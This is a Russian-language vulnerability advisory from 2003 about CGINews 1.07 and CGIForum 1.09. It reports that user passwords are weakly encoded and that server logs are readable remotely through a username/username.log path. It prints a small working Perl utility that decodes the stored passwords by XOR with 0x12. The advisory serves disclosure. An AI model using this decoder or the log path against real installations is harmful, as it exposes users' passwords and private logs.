Дата публикации: | 17.12.2003 |
Всего просмотров: | 1135 |
Опасность: | Низкая |
Наличие исправления: | Частично |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Локальная |
Воздействие: | Раскрытие важных данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: |
CGINews 1.x
CGIForum 1.x |
Уязвимые версии: CGINews 1.07 и CGIForum 1.09
Описание: Уязвимость обнаружена в CGINews и CGIForum. Локальный пользователь может расшифровать пароли. Удаленный пользователь может просматривать журналы регистрации. Пароли пользователей в *.pwl файлах закодированы слабым алгоритмом шифрования, который легко может быть взломан локальным пользователем. Удаленный пользователь может читать лог файлы на сервере в конфигурации по умолчанию, используя следующий формат: username/username.log Пример/Эксплоит: print "CGI News 1.07 - Pass Decrypt Utility \n"; print "------------------------------------ \n"; print "By JeiAr [ http://www.gulftech.org ] \n"; print "\n" x 3; print "Please Enter Encrypted Pass:"; $UserPassword = <STDIN>; chomp $UserPassword; $UserPassword = EncDec($UserPassword); print "\n" x 5; print "Encrypted Pass Is: $UserPassword"; sub EncDec { my @args = split //, shift(); my $retval = ''; for (my $stringpos = 0; $stringpos <= $#args; $stringpos++) { $retval .= chr(ord($args[$stringpos]) ^ 0x12); } return $retval; } exit; URL производителя: http://triskam.virtualave.net/cginews.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | Issues In CGINews and CGIForum |